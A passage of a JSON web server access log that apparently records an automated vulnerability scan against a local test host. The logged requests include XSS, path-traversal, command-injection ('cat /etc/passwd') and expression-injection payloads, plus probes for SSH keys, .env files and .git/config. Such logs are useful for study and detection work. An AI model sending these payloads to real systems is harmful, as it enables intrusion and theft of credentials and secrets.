HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /feed/rdf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crossdomain.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login?&err=--%3E%3Cscript%3Ealert('29KAnkCyvXzkEFTJS5gMutqwIUt')%3C/script%3E%3C!--&lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?phpinfo=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 